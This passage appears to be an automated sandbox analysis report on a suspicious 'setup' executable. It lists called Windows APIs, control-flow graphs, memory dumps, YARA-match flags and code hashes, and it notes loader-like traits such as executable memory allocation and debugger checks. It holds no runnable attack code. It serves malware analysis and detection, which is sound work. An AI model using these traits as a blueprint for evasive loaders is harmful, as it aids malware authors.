                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02010533
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CreateWindow
                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                • API String ID: 716092398-2341455598
                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction ID: d7a2e230114da5a459ccd3ee0db3b3e2aa8dea0fa0380767c00cfb03709b9de9
                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction Fuzzy Hash: 0C512B70E08388DEEB11CBE8C849BDEBFB26F11708F144158D5847F286C3BA5658CB66

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 86 20105b0-20105d5 87 20105dc-20105e0 86->87 88 20105e2-20105f5 GetFileAttributesA 87->88 89 201061e-2010621 87->89 90 2010613-201061c 88->90 91 20105f7-20105fe 88->91 90->87 91->90 92 2010600-201060b call 2010420 91->92 94 2010610 92->94 94->90
                APIs
                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 020105EC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID: apfHQ$o
                • API String ID: 3188754299-2999369273
                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction ID: 0ccf2788dc3745a7ebb0a5196846a09345a99fef510eb7fec12fb923101118f3
                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction Fuzzy Hash: EA012170C0425CEFDF11DB98C5583AEBFB6AF41308F1480D9D8492B241D7769B98DBA1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 95 405140-405171 LoadLibraryA
                APIs
                • LoadLibraryA.KERNELBASE(msimg32.dll), ref: 0040516B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: LibraryLoad
                • String ID: msimg32.dll
                • API String ID: 1029625771-3287713914
                • Opcode ID: 510fd2db197632bcf2b5400ee185edd6af120d3a10cdee494f0684019291e702
                • Instruction ID: a97f874fd3ede9c77d5cc71c1f362ee5ff0d4b4606f6ab035d2116e86b642631
                • Opcode Fuzzy Hash: 510fd2db197632bcf2b5400ee185edd6af120d3a10cdee494f0684019291e702
                • Instruction Fuzzy Hash: 65C002F0852301CADB80CF44AD8BB173EB8BA227017A09029C0A0DA771D7740145CB1E

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 109 1f3c485-1f3c4bf call 1f3c798 112 1f3c4c1-1f3c4f4 VirtualAlloc call 1f3c512 109->112 113 1f3c50d 109->113 115 1f3c4f9-1f3c50b 112->115 113->113 115->113
                APIs
                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 01F3C4D6
                Memory Dump Source
                • Source File: 00000000.00000002.2088895615.0000000001F3C000.00000040.00000020.00020000.00000000.sdmp, Offset: 01F3C000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1f3c000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction ID: d8e5ddace132764e72100555dd0e829b6a5547af3c055d9f82b7583f97dca46c
                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction Fuzzy Hash: 05113C79A00208EFDB01DF98C985E99BFF5AF48750F058095F948AB361D371EA90DF80
                APIs
                • FindExecutableA.SHELL32(00000000,00000000,00000000), ref: 00405C00
                • CoGetInstanceFromFile.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00405C18
                • _wprintf.LIBCMT ref: 00405C24
                • _wprintf.LIBCMT ref: 00405C30
                  • Part of subcall function 004094DD: __stbuf.LIBCMT ref: 0040952B
                  • Part of subcall function 004094DD: __output_l.LIBCMT ref: 00409543
                  • Part of subcall function 004094DD: __ftbuf.LIBCMT ref: 00409554
                • _wscanf.LIBCMT ref: 00405C3D
                  • Part of subcall function 004094C0: _vwscanf.LIBCMT ref: 004094D3
                • _wscanf.LIBCMT ref: 00405C4D
                  • Part of subcall function 00409413: DeleteFileA.KERNEL32(?), ref: 0040941B
                  • Part of subcall function 00409413: GetLastError.KERNEL32 ref: 00409425
                  • Part of subcall function 00409413: __dosmaperr.LIBCMT ref: 00409434
                  • Part of subcall function 004093E0: MoveFileA.KERNEL32(?,?), ref: 004093EB
                  • Part of subcall function 004093E0: GetLastError.KERNEL32 ref: 004093F5
                  • Part of subcall function 004093E0: __dosmaperr.LIBCMT ref: 00409404
                • _wprintf.LIBCMT ref: 00405C8B
                • _malloc.LIBCMT ref: 00405C92
                  • Part of subcall function 0040934C: __FF_MSGBANNER.LIBCMT ref: 00409365
                  • Part of subcall function 0040934C: __NMSG_WRITE.LIBCMT ref: 0040936C
                  • Part of subcall function 0040934C: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0040A0EE,00409A0C,00000001,00409A0C,?,00412031,00000018,00418DE8,0000000C,004120C1), ref: 00409391
                  • Part of subcall function 0040929F: _malloc.LIBCMT ref: 004092AD
                • LookupAccountSidW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 00405CFB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: File_wprintf$ErrorLast__dosmaperr_malloc_wscanf$AccountAllocDeleteExecutableFindFromHeapInstanceLookupMove__ftbuf__output_l__stbuf_vwscanf
                • String ID: %s %d %f$*gA$*gA$0 %f$msimg32.dll
                • API String ID: 216097146-3880135513
                • Opcode ID: 6c1423a3ec743d6a0c027734e855bfd4626f5f97dddd0510832e8e54d6c82362
                • Instruction ID: bd489db0e87fc7cc01aa0fe857db6aeda3763cf657610c122e5a3c5e76d21110
                • Opcode Fuzzy Hash: 6c1423a3ec743d6a0c027734e855bfd4626f5f97dddd0510832e8e54d6c82362
                • Instruction Fuzzy Hash: D2218175789300B6F260BBA59C43F9A3754AB54B09F10843AF7497A1E2D6F838058B6E
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset$_free_malloc_strstr$_wcsstr
                • String ID: "
                • API String ID: 430003804-123907689
                • Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                • Instruction ID: 5de8dc7b187c4db7d924c77195cc831881435b3d806fa9f4fb98133685567f4e
                • Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                • Instruction Fuzzy Hash: 3F42E271508391AFD721DF24CC48B9BBBE8BF85348F04092EF98997191DB75E509CBA2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: <$x2Q
                • API String ID: 2102423945-643667464
                • Opcode ID: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
                • Instruction ID: 703a5fa08f0acc757f772243bf27264362b7969705600cf75dd4fde8562e3d0d
                • Opcode Fuzzy Hash: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
                • Instruction Fuzzy Hash: 9CD2BF706043519FD755EF24D894B9FBBEABF84308F40092EE88687290EB75A50DDF92
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                • Instruction ID: 68243f5986f148cb48a9213e046d5c80291010d666de921836ff68cef6f7d93d
                • Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                • Instruction Fuzzy Hash: 49525C71D00328DFDB11DFA8C885BDEBBFAAF14308F50816AD419A7250E735AA49DF91
                APIs
                • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,004128EA,?,0040A873,?,000000BC,?,00000001,00000000,00000000), ref: 004122EC
                • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,004128EA,?,0040A873,?,000000BC,?,00000001,00000000,00000000), ref: 00412315
                • GetACP.KERNEL32(?,?,004128EA,?,0040A873,?,000000BC,?,00000001,00000000), ref: 00412329
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: 5858dc6f94d99f83be33dccf630f9b126566a8c49a8850891d887983497bc18c
                • Instruction ID: 541a64dcdbbf5dc7754b7aa8a0ed8816bf62bbf427e2e4fe1483b6cdfe284a96
                • Opcode Fuzzy Hash: 5858dc6f94d99f83be33dccf630f9b126566a8c49a8850891d887983497bc18c
                • Instruction Fuzzy Hash: 4B01D83050020FBAE7259B61DE05BEF76A8BB04758F24406AF901F51D1EBBCCE91929C
                APIs
                • _wcsstr.LIBCMT ref: 0201E72D
                • _wcsstr.LIBCMT ref: 0201E756
                • _memset.LIBCMT ref: 0201E784
                  • Part of subcall function 0205FC0C: std::exception::exception.LIBCMT ref: 0205FC1F
                  • Part of subcall function 0205FC0C: __CxxThrowException@8.LIBCMT ref: 0205FC34
                  • Part of subcall function 0205FC0C: std::exception::exception.LIBCMT ref: 0205FC4D
                  • Part of subcall function 0205FC0C: __CxxThrowException@8.LIBCMT ref: 0205FC62
                  • Part of subcall function 0205FC0C: std::regex_error::regex_error.LIBCPMT ref: 0205FC74
                  • Part of subcall function 0205FC0C: __CxxThrowException@8.LIBCMT ref: 0205FC82
                  • Part of subcall function 0205FC0C: std::exception::exception.LIBCMT ref: 0205FC9B
                  • Part of subcall function 0205FC0C: __CxxThrowException@8.LIBCMT ref: 0205FCB0
                • _wcsstr.LIBCMT ref: 0201EA0C
                • _memset.LIBCMT ref: 0201EE5C
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
                • String ID:
                • API String ID: 1338678108-0
                • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                • Instruction ID: a83f37e1622e1d32032eb488fae55848cdd73c066add569d8b1209ac4966e398
                • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                • Instruction Fuzzy Hash: 9952DD71E003198FDF25CF68C894BAEBBF6BF44304F144569E84AAB281D7319945DF91
                APIs
                • IsDebuggerPresent.KERNEL32 ref: 00410C34
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00410C49
                • UnhandledExceptionFilter.KERNEL32(00402FD8), ref: 00410C54
                • GetCurrentProcess.KERNEL32(C0000409), ref: 00410C70
                • TerminateProcess.KERNEL32(00000000), ref: 00410C77
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID:
                • API String ID: 2579439406-0
                • Opcode ID: 1c95e6085fc9a03cd8e282e37b867c2d2abd5018ee9ce5de8835c00abc25c6fd
                • Instruction ID: 83d3ef2e3e956abaeec0d3a13e97bb118a1a7b19374e6ca3b9f34d0de00b0f34
                • Opcode Fuzzy Hash: 1c95e6085fc9a03cd8e282e37b867c2d2abd5018ee9ce5de8835c00abc25c6fd
                • Instruction Fuzzy Hash: 7121ECB4403204DFD764DFA5ED846643BA0FF2A350F10401AE508AB3B1DF7459CAAF69
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                • Instruction ID: 737b058f87286ccf444b8a9b56bf80fd2a4b8f3250e4d6edaa413f30874d5053
                • Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                • Instruction Fuzzy Hash: 82426A71D00328DBDF15DFA4C884BDEB7F6AF14308F20416AD819A7291E731AA49DFA5
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                • Instruction ID: 5ab16d2fc2b208519069f5570f15c57028d0581a3b2d17603abe151fb9a8b9d7
                • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                • Instruction Fuzzy Hash: D8526370E00349DFDB50DBA4C888FEEBBB5BF49704F148198E905AB290DB71AD46DB90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: $
                • API String ID: 0-3993045852
                • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                • Instruction ID: 44327b3f7aa09d093ec100542e798f82d79bebff85442494434bedd0bd2ec7b6
                • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                • Instruction Fuzzy Hash: 3C3253B1E003299FDF619F64CC44BAEB7B9FF45704F0041EAAA0DA6150DB758A80EF59
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_0000F37D), ref: 0040F3C4
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: 8b02ddd9799c2e9baade90de9b858857d9df3717d9c52e890c53b0a2c8ec36d6
                • Instruction ID: d15c3856762673d9a860fed50234b4c5907ae6109ad8480c19df108b0dbb8130
                • Opcode Fuzzy Hash: 8b02ddd9799c2e9baade90de9b858857d9df3717d9c52e890c53b0a2c8ec36d6
                • Instruction Fuzzy Hash: 1C9002B029174487C7241BB05D0990525905E4CB2275104716582E84A8EA7440445519
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                • Instruction ID: 48d2cae4fce2fc08a29752e211a6147269f70ac355730250ac7678b39d630824
                • Opcode Fuzzy Hash: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                • Instruction Fuzzy Hash: 9942B071629F158BC3DADF24C88055BF3E1FFC8218F048A1DD99997A90DB38F819CA91
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                • Instruction ID: 8839828b1494122aebef3a44900d5d4e7f0c58717e05b5d74f314a70d7fc5230
                • Opcode Fuzzy Hash: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                • Instruction Fuzzy Hash: 0222EFB6905B128FC714CF19D08065AF7E1FF88324F558A6EE9A9A7B10C730BA55CF81
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                • Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                • Instruction ID: 3850a937db056432549bc0ae5a0f1b6c6f701d944da03e1997b99327096bf555
                • Opcode Fuzzy Hash: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                • Instruction Fuzzy Hash: 88026A711187058FC756EF1CD49035AF3E2FFC8309F198A2DD68987A64E739A9198F82
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                • Instruction ID: 6a61aaf81cceb962ac43e89968d19062db41915cb31680b98768ff6a35e7641c
                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                • Instruction Fuzzy Hash: B4C1B373D5E5F3058B35492D05182BFEE626E81B4231FC3D2DCD43F289C22A6EA696D4
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                • Instruction ID: 40c5bba72be2bd0c517143db8d646a4e8df15b0bf286e77e2c208ca2fd5b34d0
                • Opcode Fuzzy Hash: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                • Instruction Fuzzy Hash: BEC12833E2477906D764DEAE8C540AAB6E3AFC4220F9B477DDDD4A7242C9306D4A86C0
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                • Instruction ID: 210b0bbc6fa7648ea2dec32900c8f8778a93b69b975d2da7577560c404c6e586
                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                • Instruction Fuzzy Hash: 0AC1D473D5A5F30587354A2D05182BBEEA16E81B4131FC392DCD43F389C22A6EA6D6D4
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                • Instruction ID: 6eec013b71eef5318892018cd6e300d142aaee19a75d0edf2b716afb68a11fe7
                • Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                • Instruction Fuzzy Hash: C4A1DA0A8090E4ABEF455A7E90B63EBAFE9CB27354E76719284D85B793C019120FDF50
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
                • Opcode Fuzzy Hash: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                • Instruction ID: 5199c5bc16864de70c6dcf7905d63cf28dc46ea8416786d032595d3cba67f2f8
                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                • Instruction Fuzzy Hash: 5AC1E533D5E5F3058B36492D05182BFEE626E81B4531FC3D2CCD43F689C62A6EA685D4
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                • Instruction ID: a2b0026a64bfaf7b2cdf986373f4502d60de115db649975ff53bd1799c231f25
